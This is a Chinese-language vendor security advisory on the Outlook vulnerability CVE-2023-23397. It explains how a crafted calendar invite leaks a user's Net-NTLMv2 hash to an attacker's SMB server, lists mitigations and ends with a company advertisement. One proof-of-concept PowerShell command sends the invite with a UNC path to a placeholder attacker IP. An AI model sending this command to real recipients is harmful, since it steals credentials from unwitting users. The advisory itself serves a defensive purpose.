Outlook(CVE-2023-23397)的檢測(cè)復(fù)現(xiàn)與修復(fù)
前言
安盟信息實(shí)驗(yàn)室安全研究員最近發(fā)現(xiàn)CVE-2023-23397(outlook漏洞)在野利用,由于outlook在企業(yè)中廣泛使用,護(hù)網(wǎng)在即,為避免漏洞利用造成的危害,他們復(fù)現(xiàn)了該漏洞。
漏洞描述
Microsoft Office Outlook是微軟辦公軟件套裝的組件之一,可以用來收發(fā)電子郵件、管理聯(lián)系人信息、安排日程等功能。
CVE-2023-23397是Microsoft Outlook欺騙漏洞,可導(dǎo)致身份驗(yàn)證繞過,未經(jīng)身份驗(yàn)證的攻擊者可以通過向受影響的系統(tǒng)發(fā)送特制電子郵件來利用該漏洞獲取用戶的Net-NTLMv2哈希。
漏洞原理
攻擊者向受害者發(fā)送一條帶有MAPI(Messaging Application Programming Interface)屬性的消息,其中UNC路徑為攻擊者控制的服務(wù)器上的SMB(TCP 445端口)。攻擊者發(fā)送帶有惡意日歷邀請(qǐng)的郵件,來使“PidLidReminderFileParameter”(提醒的自定義警報(bào)聲音選項(xiàng))觸發(fā)易受攻擊的 API 端點(diǎn) PlayReminderSound。部分Poc代碼如下:
漏洞利用
Send-CalendarNTLMLeak -recipient "收件郵箱地址XXXX@XX.COM" -remotefilepath "\\攻擊機(jī)IP\d.wav" -meetingsubject "會(huì)議主題" -meetingbody "會(huì)議內(nèi)容"
觸發(fā)UNC_PATH成功抓到HASH:
緩解措施
1.立即應(yīng)用供應(yīng)商補(bǔ)丁。微軟發(fā)布了一個(gè)補(bǔ)丁,作為其 2023 年 3 月月度安全更新的一部分。
2.阻止 TCP 445/SMB 從您的網(wǎng)絡(luò)出站。這將阻止將 NTLM 身份驗(yàn)證消息發(fā)送到遠(yuǎn)程文件共享。如果無法做到這一點(diǎn),我們建議監(jiān)控通過端口 445 的出站流量以查找未知的外部 IP 地址,然后識(shí)別并阻止它們。
3.客戶可以禁用 WebClient 服務(wù)。請(qǐng)注意,這將阻止所有 WebDAV 連接,包括內(nèi)聯(lián)網(wǎng)。
4.將用戶添加到受保護(hù)的用戶安全組。這會(huì)阻止使用 NTLM 作為身份驗(yàn)證機(jī)制,但請(qǐng)注意,這可能會(huì)影響在您的環(huán)境中依賴 NTLM 的應(yīng)用程序。
5.在客戶端和服務(wù)器上強(qiáng)制執(zhí)行 SMB 簽名以防止中繼攻擊。
其他研究人員指出,禁用Outlook 中的“顯示提醒”設(shè)置可以防止 NTLM 憑據(jù)泄露。
安盟信息依托豐富的實(shí)踐經(jīng)驗(yàn)與雄厚技術(shù)研發(fā)實(shí)力,積極發(fā)揮自身檢測(cè)預(yù)警的優(yōu)勢(shì),全面掌握漏洞動(dòng)態(tài),為各行業(yè)客戶提供全方位的網(wǎng)絡(luò)安全解決方案,快速提升客戶整體網(wǎng)絡(luò)安全性,如有漏洞檢測(cè)與應(yīng)急需求,請(qǐng)及時(shí)聯(lián)系我們。安盟信息靈犀實(shí)驗(yàn)室可以提供完整的解決方案與檢測(cè)腳本,全方位為您保駕護(hù)航!
提交
一站式全覆蓋|安盟信息助力建設(shè)云密碼服務(wù)運(yùn)營體系
商用密碼產(chǎn)品|服務(wù)器密碼機(jī)的前世今生
創(chuàng)新商用密碼應(yīng)用|火力發(fā)電廠信息系統(tǒng)密碼應(yīng)用方案
攜手共赴未來 護(hù)航數(shù)智發(fā)展 新奧集團(tuán)與安盟信息簽署戰(zhàn)略合作
智慧礦山無人礦車密碼應(yīng)用解決方案